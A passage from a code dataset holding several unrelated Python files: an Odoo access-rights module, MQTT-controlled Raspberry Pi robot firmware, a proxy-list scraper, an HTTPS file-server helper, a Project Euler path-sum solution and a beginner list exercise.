机器学习03/test_20210202/test06.py","file_name":"test06.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"21240018","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom odoo import models, fields, api, _\nfrom odoo.exceptions import UserError\nfrom lxml import etree\nfrom dateutil.relativedelta import relativedelta\n\n\nclass ResPartnerInh(models.Model):\n _inherit = 'res.partner'\n\n user_id = fields.Many2one('res.users', default=lambda self: self.env.uid)\n partner_id = fields.Many2one('res.partner')\n # is_same_branch = fields.Boolean(compute='compute_is_same_branch')\n\n\n @api.model\n def _search(self, args, offset=0, limit=None, order=None, count=False, access_rights_uid=None):\n if self._context.get('my_branch'):\n args += [('branch_id', '!=', False),\n ('branch_id', 'in', [branch.id for branch in self.env.user.branch_ids])]\n return super(ResPartnerInh, self)._search(args, offset=offset, limit=limit, order=order, count=count,\n access_rights_uid=access_rights_uid)\n\n # def compute_is_same_branch(self):\n #\n # for rec in self:\n # print()\n 
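Looking back at test06.py just above: GridSearchCV cross-validates every combination in param_grid and exposes the winner via best_params_. A trimmed, self-contained variant (assuming scikit-learn and NumPy are installed), with a deliberately small grid so it finishes quickly:

import numpy as np
from sklearn.kernel_ridge import KernelRidge
from sklearn.model_selection import GridSearchCV

rng = np.random.RandomState(0)
X = 5 * rng.rand(40, 1)
y = np.sin(X).ravel()

search = GridSearchCV(KernelRidge(),
                      param_grid={"kernel": ["rbf", "laplacian"],
                                  "alpha": [1.0, 0.1],
                                  "gamma": np.logspace(-2, 2, 5)},
                      cv=3)
search.fit(X, y)
print(search.best_score_, search.best_params_)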
# if rec.branch_id.id == rec.env.user.branch_id.id:\n # rec.is_same_branch = True\n # else:\n # rec.is_same_branch = False\n\n @api.onchange('user_id')\n def onchange_partner_id(self):\n for rec in self:\n partner = self.env['res.partner'].search([('name', '=', rec.user_id.name)], limit=1)\n rec.partner_id = partner.id\n\n\nclass ProductTemplateInh(models.Model):\n _inherit = 'product.template'\n\n @api.model\n def fields_view_get(self, view_id=None, view_type='tree', toolbar=False, submenu=False):\n # result = fields_view_get_extra(self, view_id=view_id, view_type=view_type, toolbar=toolbar, submenu=submenu)\n result = super(ProductTemplateInh, self).fields_view_get(\n view_id=view_id, view_type=view_type, toolbar=toolbar,\n submenu=submenu)\n\n if self.env.user.has_group('sales_consultant_user_rights.group_readonly_user'):\n temp = etree.fromstring(result['arch'])\n temp.set('create', '0')\n temp.set('edit', '0')\n result['arch'] = etree.tostring(temp)\n\n return result\n\n\nclass StockPickingInh(models.Model):\n _inherit = 'stock.picking'\n\n is_reserve_approved = fields.Boolean(default=False)\n is_notified = fields.Boolean(default=False)\n is_sent_for_approval = fields.Boolean(default=False)\n state = fields.Selection([\n ('draft', 'Draft'),\n ('waiting', 'Waiting Another Operation'),\n ('confirmed', 'Waiting'),\n ('manager_approval', 'Approval from Manager'),\n ('ceo_approval', 'Approval from CEO'),\n ('reserve_manager_approvals', 'Reserve Extension Approval from Manager'),\n ('reserve_ceo_approval', 'Reserve Extension Approval from CEO'),\n ('assigned', 'Ready'),\n ('done', 'Done'),\n ('cancel', 'Cancelled'),\n ], string='Status', compute='_compute_state',\n copy=False, index=True, readonly=True, store=True, tracking=True,\n help=\" * Draft: The transfer is not confirmed yet. 
Reservation doesn't apply.\\n\"\n \" * Waiting another operation: This transfer is waiting for another operation before being ready.\\n\"\n \" * Waiting: The transfer is waiting for the availability of some products.\\n(a) The shipping policy is \\\"As soon as possible\\\": no product could be reserved.\\n(b) The shipping policy is \\\"When all products are ready\\\": not all the products could be reserved.\\n\"\n \" * Ready: The transfer is ready to be processed.\\n(a) The shipping policy is \\\"As soon as possible\\\": at least one product has been reserved.\\n(b) The shipping policy is \\\"When all products are ready\\\": all product have been reserved.\\n\"\n \" * Done: The transfer has been processed.\\n\"\n \" * Cancelled: The transfer has been cancelled.\")\n\n @api.model\n def fields_view_get(self, view_id=None, view_type='form', toolbar=False, submenu=False):\n result = super(StockPickingInh, self).fields_view_get(\n view_id=view_id, view_type=view_type, toolbar=toolbar,\n submenu=submenu)\n if not self.env.user.has_group('sales_consultant_user_rights.group_show_do_buttons_user'):\n temp = etree.fromstring(result['arch'])\n temp.set('create', '0')\n temp.set('duplicate', '0')\n temp.set('delete', '0')\n temp.set('edit', '0')\n result['arch'] = etree.tostring(temp)\n if self.env.user.has_group('sales_consultant_user_rights.group_readonly_user'):\n temp = etree.fromstring(result['arch'])\n temp.set('create', '0')\n temp.set('edit', '0')\n result['arch'] = etree.tostring(temp)\n return result\n\n def test_action(self):\n print(self.state)\n\n def check_date(self):\n transfers = self.env['stock.picking'].search([('state', 'in', ['assigned'])])\n for rec in transfers:\n if rec.scheduled_date:\n diff = datetime.today() - rec.create_date\n if abs(diff.days) > 25:\n rec._create_notification()\n rec.is_notified = True\n if abs(diff.days) >= 30:\n if rec.is_reserve_approved:\n rec.scheduled_date = rec.scheduled_date + relativedelta(days=15)\n else:\n rec.do_unreserve()\n\n def _create_notification(self):\n # groupObj = self.env['res.groups'].search([('name', '=', \"Administrator\")])\n # user_list = []\n # for user in groupObj.users:\n # user_list.append(user.id)\n # if self.sale_id.user_id.id not in user_list:\n # if self.sale_id.user_id.id:\n # user_list.append(self.sale_id.user_id.id)\n # for i in user_list:\n # userObj = self.env['res.users'].browse([i])\n act_type_xmlid = 'mail.mail_activity_data_todo'\n summary = 'Reserved DO Notification'\n note = '25 Days passed.In 5 days left, DO no: ' + self.name + ' will be unreserved Automatically.'\n if act_type_xmlid:\n activity_type = self.sudo().env.ref(act_type_xmlid)\n model_id = self.env['ir.model']._get(self._name).id\n create_vals = {\n 'activity_type_id': activity_type.id,\n 'summary': summary or activity_type.summary,\n 'automated': True,\n 'note': note,\n 'date_deadline': datetime.today(),\n 'res_model_id': model_id,\n 'res_id': self.id,\n 'user_id': self.sale_id.user_id.id,\n }\n activities = self.env['mail.activity'].create(create_vals)\n\n def action_reserve_approval_manager(self):\n self.state = 'reserve_ceo_approval'\n\n def action_reserve_approval_ceo(self):\n # for rec in self:\n self.is_reserve_approved = True\n self.state = 'assigned'\n\n def action_send_for_approvals(self):\n for rec in self:\n rec.is_sent_for_approval = True\n rec.state = 'reserve_manager_approvals'\n\n\nclass AccountMoveInh(models.Model):\n _inherit = 'account.move'\n\n @api.model\n def fields_view_get(self, view_id=None, view_type='form', toolbar=False, 
submenu=False):\n result = super(AccountMoveInh, self).fields_view_get(\n view_id=view_id, view_type=view_type, toolbar=toolbar,\n submenu=submenu)\n if self.env.user.has_group('sales_consultant_user_rights.group_show_invoice_buttons_user'):\n pass\n else:\n temp = etree.fromstring(result['arch'])\n temp.set('create', '0')\n temp.set('duplicate', '0')\n temp.set('delete', '0')\n temp.set('edit', '0')\n result['arch'] = etree.tostring(temp)\n return result\n\n","sub_path":"sales_consultant_user_rights/models/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"230524688","text":"import paho.mqtt.client as mqtt #mqtt https://github.com/eclipse/paho.mqtt.python\nimport time #tb6612fng\nimport RPi.GPIO as GPIO\nimport smbus #mpu6050\nimport math\nimport os #temperature & commands\nimport urllib #take picture\nfrom datetime import datetime\nimport subprocess\nfrom config import * #config file\n\ntopic =\"r2b2/7/tmp\"\nstart_time= time.time()\n\nGPIO.cleanup()\nGPIO.setmode(GPIO.BOARD) # Set GPIO mode to BCM\nGPIO.setwarnings(False);\n\n# PWM Frequency\npwmFreq = 100\n\n# Setup Pins for motor controllers\nGPIO.setup(12, GPIO.OUT) # PWMA 19\nGPIO.setup(18, GPIO.OUT) # AIN2 21\nGPIO.setup(16, GPIO.OUT) # AIN1 23\nGPIO.setup(22, GPIO.OUT) # STBY 12 \nGPIO.setup(15, GPIO.OUT) # BIN1 29\nGPIO.setup(13, GPIO.OUT) # BIN2 26\nGPIO.setup(11, GPIO.OUT) # PWMB 31\n\n#2nd\nGPIO.setup(19, GPIO.OUT) # PWMA 19\nGPIO.setup(23, GPIO.OUT) # AIN2 21\nGPIO.setup(21, GPIO.OUT) # AIN1 23\nGPIO.setup(24, GPIO.OUT) # STBY 12 \nGPIO.setup(29, GPIO.OUT) # BIN1 29\nGPIO.setup(26, GPIO.OUT) # BIN2 26\nGPIO.setup(31, GPIO.OUT) # PWMB 31\n\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n \n # Subscribing in on_connect() - if we lose the connection and\n # reconnect then subscriptions will be renewed.\n #client.subscribe(\"r2b2/7\")\n client.subscribe(\"r2b2/7/#\")\n\ndef on_disconnect(client, userdata, rc):\n print(\"*DISCONNECTED*\")\n mStop()\n\ndef on_message(client , userdata, msg):\n# print(\"msg: \"+msg.payload[:3]+\" - spd:\"+ msg.payload[4:])\n print(\"Msg: \"+str(msg.payload))\n if msg.payload == \"ping\":\n ping()\n if msg.payload == \"calibrate\": print(\"calibrate\")\n if msg.payload == \"pwrOff\": os.system('sudo shutdown -h now')\n if msg.payload == \"getTemp\": measure_temp(client)\n if msg.payload == \"stop\": mStop()\n if msg.payload == \"recStop\": os.system('sudo killall ffmpeg')\n if msg.payload == \"flwStop\": os.system('pgrep -f \"python3 /home/pi/R2B2_RaspberryPi/Code/track.py\" | xargs kill')\n\n if msg.payload == \"pic\":\n now = datetime.now()\n dt_string = now.strftime(\"pic_%d%m%Y_%H%M%S\")#pic_ddmmyyyy_hhmmss\n urllib.urlretrieve(\"http://\"+ipR2B2+\":8181/?action=snapshot\", \"/home/pi/Pictures/\"+dt_string+\".jpg\")\n \n if msg.payload[:3] == \"dwn\":\n runMotor(1,msg.payload[4:],1)#1\n runMotor2(0,msg.payload[4:],1)#4\n if msg.payload[:3] == \"mup\":\n runMotor(1,msg.payload[4:],0)#1\n runMotor2(0,msg.payload[4:],0)#4\n if msg.payload[:3] == \"rt+\":\n runMotor2(1,msg.payload[4:],0)#2\n runMotor(0,msg.payload[4:],0)#3\n if msg.payload[:3] == \"rt-\":\n runMotor2(1,msg.payload[4:],1)#2\n runMotor(0,msg.payload[4:],1)#3\n \n if msg.payload[:3] == \"mRB\":\n runMotor2(1,msg.payload[4:],1)#2\n if int(msg.payload[4:])>20: runMotor(0,int(msg.payload[4:])-20,0)#3\n if msg.payload[:3] == \"mRF\":\n if int(msg.payload[4:])>20: 
runMotor2(1,int(msg.payload[4:])-20,0)#2\n runMotor(0,msg.payload[4:],1)#3\n if msg.payload[:3] == \"mRS\":\n mStop()\n if msg.payload[:3] == \"mLB\":\n if int(msg.payload[4:])>20: runMotor2(1,int(msg.payload[4:])-20,1)#2\n runMotor(0,msg.payload[4:],0)#3\n if msg.payload[:3] == \"mLF\":\n runMotor2(1,msg.payload[4:],0)#2\n if int(msg.payload[4:])>20: runMotor(0,int(msg.payload[4:])-20,1)#3\n if msg.payload[:3] == \"mLS\":\n motorStop2()\n if msg.payload[:3] == \"mBB\":\n runMotor2(1,msg.payload[4:],1)#2\n runMotor(0,msg.payload[4:],0)#3\n if msg.payload[:3] == \"mFS\":\n motorStop()\n if msg.payload[:3] == \"mFF\":#4\n runMotor2(1,msg.payload[4:],0)#2\n runMotor(0,msg.payload[4:],1)#3\n if msg.payload[:3] == \"mBS\":\n mStop()\n if msg.payload == \"World!\":\n print(\"Received message #2, do something else\")\n # Do something else\n \n# CPU temperature\ndef measure_temp(client):\n global topic\n temp = os.popen('vcgencmd measure_temp').readline()\n client.publish(topic,(temp.replace(\"temp=\",\"\").replace(\"'C\\n\",\"\")))\n#motor functions\n\ndef iniMotors():\n GPIO.output(12, GPIO.LOW)\n GPIO.output(18, GPIO.LOW)\n GPIO.output(16, GPIO.LOW)\n GPIO.output(22, GPIO.LOW)\n GPIO.output(15, GPIO.LOW)\n GPIO.output(13, GPIO.LOW)\n GPIO.output(11, GPIO.LOW)\n \n GPIO.output(19, GPIO.LOW)\n GPIO.output(23, GPIO.LOW)\n GPIO.output(21, GPIO.LOW)\n GPIO.output(24, GPIO.LOW)\n GPIO.output(29, GPIO.LOW)\n GPIO.output(26, GPIO.LOW)\n GPIO.output(31, GPIO.LOW) \n\ndef m2(spd):\n runMotor(0,spd,0)\n\ndef m1(spd):\n runMotor(1,spd,0)\n\ndef m4(spd):\n runMotor2(0,spd,0)\n\ndef m3(spd):\n runMotor2(1,spd,0)\n\ndef runMotor(motor, spd, direction):\n# print(\"-\"+str(spd)+\"-\")\n global currentSpd\n currentSpd=spd\n GPIO.output(22, GPIO.HIGH);\n in1 = GPIO.HIGH\n in2 = GPIO.LOW\n if(direction == 1):\n in1 = GPIO.LOW\n in2 = GPIO.HIGH\n \n if(motor == 0):\n GPIO.output(16, in1)\n GPIO.output(18, in2)\n elif(motor == 1):\n GPIO.output(15, in1)\n GPIO.output(13, in2)\n\ndef runMotor2(motor, spd, direction):\n# global pwma2\n# global pwmb2\n global currentSpd\n currentSpd=spd\n GPIO.output(24, GPIO.HIGH);\n in1 = GPIO.HIGH\n in2 = GPIO.LOW\n if(direction == 1):\n in1 = GPIO.LOW\n in2 = GPIO.HIGH\n \n if(motor == 0):\n GPIO.output(21, in1)\n GPIO.output(23, in2)\n# pwma2.ChangeDutyCycle(spd)\n #print(\"hem canviat3\")\n elif(motor == 1):\n GPIO.output(29, in1)\n GPIO.output(26, in2)\n# pwmb2.ChangeDutyCycle(spd)\n #print(\"hem canviat4\")\n\ndef mStop():\n iniMotors()\n #motorStop()\n #motorStop2()\n #m1Working = False\n\ndef motorStop():#m1 m2\n GPIO.output(22, GPIO.LOW)\n GPIO.output(15, GPIO.LOW)\n GPIO.output(16, GPIO.LOW)\n\ndef motorStop2():#m3 m4\n GPIO.output(24, GPIO.LOW)\n GPIO.output(29, GPIO.LOW)\n GPIO.output(21, GPIO.LOW)\n\n\"\"\"\nclient = mqtt.Client(userdata=pwmb1)\nclient.on_connect = on_connect\nclient.on_message = on_message\nclient.connect(ipR2B2, 1883, 60)\n#client.loop_start()\nclient.loop_forever()\n\"\"\"\ndef ping():\n global start_time\n start_time=time.time()\n\ndef main(args=None):\n # Create an MQTT client and attach our routines to it.\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n client.on_disconnect = on_disconnect\n client.connect(ipR2B2, 1883, 60)\n m1Working=0\n #client.loop_forever()\n client.loop_start()\n pwmFreq=100\n pwma1 = GPIO.PWM(12, pwmFreq) # pin 18 to PWM \n pwmb1 = GPIO.PWM(11, pwmFreq) # pin 13 to PWM\n\n pwma2 = GPIO.PWM(19, pwmFreq) # pin 18 to PWM \n pwmb2 = GPIO.PWM(31, pwmFreq) # pin 13 to PWM\n \n 
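    # start all four PWM channels at a 50% duty cycle before entering the control loop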
pwma1.start(50)\n pwmb1.start(50)\n pwma2.start(50)\n pwmb2.start(50)\n \n global currentSpd\n global oldSpd\n global start_time\n \n currentSpd = 50\n oldSpd = 50\n \n iniMotors()\n while True:\n #loop\n if currentSpd!=oldSpd:\n print(\"ei\")\n print(currentSpd)\n pwma1.ChangeDutyCycle(float(currentSpd))\n pwmb1.ChangeDutyCycle(float(currentSpd))\n pwma2.ChangeDutyCycle(float(currentSpd))\n pwmb2.ChangeDutyCycle(float(currentSpd))\n oldSpd=currentSpd\n if time.time() - start_time > 3: mStop() #elapsed time\n \n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"Code/firmwarePi.py","file_name":"firmwarePi.py","file_ext":"py","file_size_in_byte":7454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"486240652","text":"import requests\nimport re\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36\"\n }\nurl=\"https://proxy.coderbusy.com/classical/anonymous-type/highanonymous.aspx?page=2\"\nhtml = requests.get(url=url,headers=headers)\nres=html.text\n\nif res:\n find_ips = re.compile('(.*?)', re.S)\n ip_ports = find_ips.findall(res)\n print(ip_ports)\n for ip in ip_ports:\n a= ip[0].replace(\"'\",'').strip()\n b= ip[1].replace(\"'\",'').strip()\n c= a + ':' + b\n print(c)\n\n # for address_port in ip_ports:\n # yield address_port\n","sub_path":"spider/day01/RRRedis.py","file_name":"RRRedis.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"19036403","text":"import math\nimport ssl\nimport subprocess\nimport time\nfrom os import getcwd, listdir, path, stat, walk\nfrom socket import AF_INET, SO_REUSEADDR, SOCK_STREAM, SOL_SOCKET, socket\n\nfrom .constants import (AUTH_FILE, CODES, HTTP_VERSION, ROOT,\n SSL_CERT, SSL_KEY, WEBSITE_URL)\n\n\n\"\"\"\n Checks headers for request and determines if the client is authorized to view the file or not\n\"\"\"\ndef is_authorized(headers):\n auth_entry = [h for h in headers if \"Authorization: Basic \" in h]\n\n if not auth_entry:\n return False\n\n client_auth = auth_entry[0].split()[-1].strip()\n with open(AUTH_FILE, 'r') as auth:\n server_auth = auth.readline().strip()\n return server_auth == client_auth\n\n\n\"\"\"\n Parses incoming client request from the socket and returns necessary information\n\"\"\"\ndef parse_request(client_request):\n try:\n file_request = client_request[0].split()\n client_command = file_request[0] # COMMAND\n client_request_uri = file_request[1] # REQUEST_URI\n if client_request_uri == \"/\" or client_request_uri == \"/index.html\": # / --> /index.html for HTTP servers\n client_request_uri = \"/index.html\"\n if client_request_uri[-1] == \"/\":\n client_request_uri = client_request_uri[:-1] # If there's a trailing '/' (like for a directory listing), get rid of it\n if \"%20\" in client_request_uri: # Catches corner case for file with space in name - %20 used instead of space in URLs\n client_request_uri = client_request_uri.replace(\"%20\", \" \")\n if file_exists(ROOT + client_request_uri):\n filepath = ROOT + client_request_uri\n else:\n filepath = None\n version = file_request[2]\n headers = client_request[1:]\n\n return client_request_uri, client_command, filepath, version, headers\n\n except Exception as e:\n print(e)\n # Something went wrong while parsing - 400 Error\n return None, None, None, None, None\n\n\n\"\"\"\n Gets the file extension for the requested file in the 
server\n\"\"\"\ndef get_content_type(path, code=200):\n if code != 200:\n return None, \"text/html\"\n\n file_extension = path.split('.')[-1]\n if file_extension == \"txt\":\n filetype = \"text/plain\"\n elif file_extension == \"png\" or file_extension == \"jpg\" or file_extension == \"gif\":\n filetype = \"image/\" + file_extension\n elif file_extension == \"ico\":\n filetype = \"image/x-icon\"\n elif file_extension == \"svg\" or file_extension == \"xml\":\n filetype = \"image/svg+xml\"\n elif file_extension == \"html\":\n filetype = \"text/html\"\n elif file_extension == \"py\":\n filetype = \"text/plain\" # usually would be 'application/x-python-code', but we want the output to print to the browser\n elif file_extension == \"mp4\":\n filetype = \"video/mp4\"\n else:\n filetype = \"text/plain\"\n\n return file_extension, filetype\n\n\n\"\"\"\n Walks server_root directory and returns the filepath for the requested URI (or None if not present)\n\"\"\"\ndef file_exists(uri):\n if uri is None:\n return None\n directory = uri.strip(\"/\")\n directory = '/'.join((uri).split(\"/\")[:-1])\n target = uri.split(\"/\")[-1]\n print(f\"LOOKING FOR {target} in {directory}\")\n try:\n dir_files = listdir(directory)\n except Exception:\n return False\n\n return True if target in dir_files else False\n\n\n\"\"\"\n Gets data in a readable format for the requested URI on the server\n\"\"\"\ndef get_data(filepath, file_size, code):\n if file_size == 0:\n return create_response_html(code), \"text/html\"\n\n # Open file and get data\n filetype, content_type = get_content_type(filepath, code)\n if filetype == \"py\":\n # File is executable - execute and return output\n cmd = \"python3 \" + path.join(getcwd(), filepath)\n data = subprocess.check_output(cmd, shell=True)\n else:\n # File isn't an executable file - read as normal\n read_mode = \"r\" if content_type == \"text/plain\" else \"rb\" # rb for images, r for text\n try:\n if filepath == ROOT + \"/index.html\":\n filepath = ROOT\n raise IsADirectoryError\n with open(filepath, read_mode) as requested_file:\n data = requested_file.read(file_size)\n except IsADirectoryError:\n # Requested filepath is a directory - print directory html!\n data = get_directory_html(filepath)\n content_type = \"text/html\"\n return data, content_type\n\n\n\"\"\"\n Returns the path of some icon in /icons - used for directory listing\n Support for: folder, README, video, image, text, unknown\n\"\"\"\ndef get_file_icon(filepath):\n content_type = str(get_content_type(filepath))\n if path.isdir(filepath):\n return \"../icons/folder.gif\"\n elif \"README\" in filepath:\n return \"../icons/hand_right.gif\"\n elif \"video\" in content_type:\n return \"../icons/movie.gif\"\n elif \"image\" in content_type:\n return \"../icons/image.gif\"\n elif \"text\" in content_type:\n return \"../icons/text.gif\"\n else:\n return \"../icons/unknown.gif\"\n\n\n\"\"\"\n Gets size of a file and converts it into the largest reasonable unit\n\"\"\"\ndef get_size(filepath):\n sizes = [\"B\", \"K\", \"M\", \"G\"]\n original_size = stat(filepath).st_size\n size = original_size\n count = 0\n while size >= 1024 and count <= 3:\n size /= 1024\n count = count + 1\n \n return original_size, (str(math.trunc(size * 100) / 100)) + sizes[count]\n\n\n\"\"\"\n Prints html for a directory\n\"\"\"\ndef get_directory_html(filepath):\n html_filepath = filepath + \"/\"\n if html_filepath.split(\"/\")[0] == ROOT:\n html_filepath = \"/\" + '/'.join(html_filepath.split(\"/\")[1:])\n files = listdir(filepath)\n file_html = 
[]\n\n    # Parent directory (if not at root)\n    if html_filepath != \"/\":\n        parent_dir = \"/\".join(html_filepath.split(\"/\")[:-2])\n        if parent_dir == \"\":\n            parent_dir = \"/\"\n        file_html.append(f'<tr><td></td><td><a href=\"{parent_dir}\">Parent Directory</a></td><td></td><td></td></tr>')\n\n    for f in files:\n        dir_file = (filepath + \"/\" + f).strip(\"/\")\n        file_created = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(stat(dir_file).st_mtime))\n        file_size = get_size(dir_file)[1]\n        if path.isdir(dir_file):\n            f = f + \"/\"\n        file_html.append(f'<tr><td><img src=\"{get_file_icon(dir_file)}\"></td><td><a href=\"{html_filepath + f}\">{f}</a></td><td>{file_created}</td><td>{file_size}</td></tr>')\n\n    file_html = \"\\n\".join(file_html)\n\n    # NOTE: the HTML tags in this template were lost when the file was extracted;\n    # the markup below is a reconstruction of a standard directory-listing page.\n    return f\"\"\"\n    <html>\n    <head>\n        <title>Index of {html_filepath}</title>\n    </head>\n    <body>\n        <h1>Index of {html_filepath}</h1>\n        <hr>\n        <table>\n            <tr><th>Name</th><th>Last modified</th><th>Size</th></tr>\n            {file_html}\n        </table>\n        <hr>\n    </body>\n    </html>\n    \"\"\"\n\n\n\"\"\"\n    Create HTTP response with following format:\n    <status line>\n    <headers>\n    ...\n    <data>\n\"\"\"\ndef create_response(code, command, filepath, response_headers, file_size=0):\n    response_data, content_type = get_data(filepath, file_size, code)  # Data to send\n    if response_data == \"504\".encode():\n        code = 504\n        file_size = 0  # Set back to zero, otherwise it will return the contents of the script!\n        response_data, content_type = get_data(filepath, file_size, code)\n\n    response = HTTP_VERSION + \" \" + str(code) + \" \" + CODES[code][0] + \"\\r\\n\"  # HTTP/1.1 <code> <reason>\n    if code == 301:\n        # 301 Moved Permanently is used to redirect HTTP Requests to HTTPS domain\n        response += f\"Location: {WEBSITE_URL}\\r\\n\"\n    elif code == 401:\n        # 401 Unauthorized response must include Authorization Header\n        response += 'WWW-Authenticate: Basic realm=\"ChrisCohen-Webserver\"\\r\\n'\n\n    response += \"Content-Length: \" + str(len(response_data)) + \"\\r\\n\"  # Content-Length: <length>\n    response += f\"Content-Type: {content_type}\\r\\n\\r\\n\"  # Content-Type: <type>\n\n    return response, response_data\n\n\n\"\"\"\n    Creates html version of HTTP response\n\"\"\"\ndef create_response_html(code):\n    # NOTE: markup reconstructed here as well, for the same reason as above.\n    return f\"\"\"\n    <html>\n    <head>\n        <title>Chris Cohen's Web Server</title>\n    </head>\n    <body>\n        <h1>{code} {CODES[code][0]}</h1>\n        <hr>\n        <p>{CODES[code][1]}</p>\n    </body>\n    </html>
    \n \n \n \"\"\"\n\n\n\"\"\"\n Creates and binds a TCP socket that is listening for connections on the specified port number\n Lots of help setting this up from 'https://speakerdeck.com/markush/ssl-all-the-things-pycon-nz-2016?slide=18'\n\"\"\"\ndef create_tcp_sock(host, port):\n server_sock = socket(AF_INET, SOCK_STREAM) # Creates a TCP socket ready for use\n server_sock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) # Makes used port immediately available after termination of server\n #server_sock.settimeout(15) # Makes socket raise SocketTimeout after 15 seconds of inactivity\n server_sock.bind((host, port)) # Binds the TCP socket for use from any address\n server_sock.listen(5) # Listens for connections on socket\n\n # SSL\n context = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)\n context.load_cert_chain(certfile=SSL_CERT, keyfile=SSL_KEY)\n context.set_ciphers('EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH')\n\n print(f\"Listening on {host}:{port}...\")\n return server_sock, context\n","sub_path":"honeypot/server_root/vars/http_helper.py","file_name":"http_helper.py","file_ext":"py","file_size_in_byte":10400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"574051773","text":"inputTriangle = \"\"\"75\n95 64\n17 47 82\n18 35 87 10\n20 04 82 47 65\n19 01 23 75 03 34\n88 02 77 73 07 63 67\n99 65 04 28 06 16 70 92\n41 41 26 56 83 40 80 70 33\n41 48 72 33 47 32 37 16 94 29\n53 71 44 65 25 43 91 52 97 51 14\n70 11 33 28 77 73 17 78 39 68 17 57\n91 71 52 38 17 14 91 43 58 50 27 29 48\n63 66 04 68 89 53 67 30 73 16 69 87 40 31\n04 62 98 27 23 09 70 98 73 93 38 53 60 04 23\"\"\"\n\ndef formatTriangle(inputTriangle):\n triangle = []\n for line in inputTriangle.split(\"\\n\"):\n lineList = []\n for n in line.split(\" \"):\n lineList.append(int(n))\n triangle.append(lineList)\n return triangle\n\n####recursive brute force method startign from bottom -- slow\n#gets all possible combinations going up\ndef getPath(triangle, row, path):\n #at the top of the triangle\n if row == 0:\n # print(\"hello\", [0] + path)\n return [0] + path\n else:\n #can always only go to 0 on the next row if in 0 position\n if path[0] == 0:\n return getPath(triangle, row - 1, [0] + path)\n #can always only go to last positon if in last position\n elif path[0] == len(triangle[row]):\n return getPath(triangle, row - 1, [len(triangle[row]) - 1] + path)\n #compare numbers above and work out which path will create the greatest sum\n else:\n if sumPath(triangle, getPath(triangle, row - 1, [path[0]] + path)) > sumPath(triangle, getPath(triangle, row -1, [path[0] - 1] + path)):\n return getPath(triangle, row - 1, [path[0]] + path)\n else:\n return getPath(triangle, row -1, [path[0] - 1] + path)\n\n\n\ndef sumPath(triangle, path):\n sum = 0\n for i in range(len(path)):\n sum += triangle[i][path[i]]\n return sum\n\ntriangle = formatTriangle(inputTriangle)\n\nlastRow = triangle[len(triangle) - 1]\nsums = []\n#\n# #get the max values in every 2nd index for the last row (smaller ones dont need to be ever checked)\n# for i in range(0, len(lastRow), 2):\n# path = []\n# if(i != len(lastRow) -1 and lastRow[i] < lastRow[i] + 1):\n# path = getPath(triangle, len(triangle) - 2, [i + 1])\n# else:\n# path = getPath(triangle, len(triangle) - 2, [i])\n#\n#\n# sums.append(sumPath(triangle,path))\n#\n# print(\"max path sum: \", max(sums))\n# ###\n\ndef fastSum(triangle):\n trianglesSummed = triangle\n for row in range(len(triangle) - 2, -1, -1):\n for i in range(len(triangle[row])):\n 
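            # bottom-up DP: replace each cell with its value plus the larger of the two sums directly below it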
if(trianglesSummed[row + 1][i] > trianglesSummed[row + 1][i + 1]):\n trianglesSummed[row][i] = trianglesSummed[row + 1][i] + triangle[row][i]\n else:\n trianglesSummed[row][i] = trianglesSummed[row + 1][i + 1] + triangle[row][i]\n return trianglesSummed[0]\n\n\nprint(fastSum(formatTriangle(inputTriangle)))\n\n\n\n","sub_path":"EulerPython/18. Maximum path sum I.py","file_name":"18. Maximum path sum I.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"403246751","text":"#!/usr/bin/python\n##############################################\n# unpack a packapp.py output file\n# % unpaclapp.py packed1 -v\n# apptools.appRun('unpaclapp.py', args...)\n# apptools.appCall(UnpackApp, args...)\n##############################################\n\nfrom textpacl import marker\nimport StreamApp # real: from PP3E.System.App.Kinds.redirect import StreamApp\n\nclass UnpackApp(StreamApp):\n def start(self):\n StreamApp.start(self)\n self.endargs() # ignore more -o's, etc\n def run(self):\n mlen = len(marker)\n while True:\n line = self.readline()\n if not line: break\n elif line [:mlen] != marker:\n self.write(line)\n else:\n name = line[mlen:].strip()\n self.message('creating: ' + name)\n self.setOutput(name)\n\nif __name__ == '__main__': UnpackApp().main()\n","sub_path":"Python/ProgramPython/c6/unpackapp.py","file_name":"unpackapp.py","file_ext":"py","file_size_in_byte":910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"565871675","text":"# Treasure Map\n# Instructions\n# You are going to write a program which will mark a spot with an X.\n\n# In the starting code, you will find a variable called `map`.\n# This ```map``` contains a nested list.\n# When ```map``` is printed this is what the nested list looks like:\n\n# ['⬜️', '⬜️', '⬜️'],['⬜️', '⬜️', '⬜️'],['⬜️', '⬜️', '⬜️']\n\n# In the starting code, we have used new lines (```\\n```) to format the three rows into a square, like this:\n\n# ['⬜️', '⬜️', '⬜️']\n# ['⬜️', '⬜️', '⬜️']\n# ['⬜️', '⬜️', '⬜️']\n\n# This is to try and simulate the coordinates on a real map. \n\n# Your job is to write a program that allows you to mark a square on the map using a two-digit system. \n# First your program must take the user input and convert it to a usable format.\n# Next, you need to use it to update your nested list with an \"x\". \n\n# The first digit is the vertical column number and the second digit is the horizontal row number. e.g.:\n# Example Input 1: column 2, row 3 would be entered as: 23\n\n# 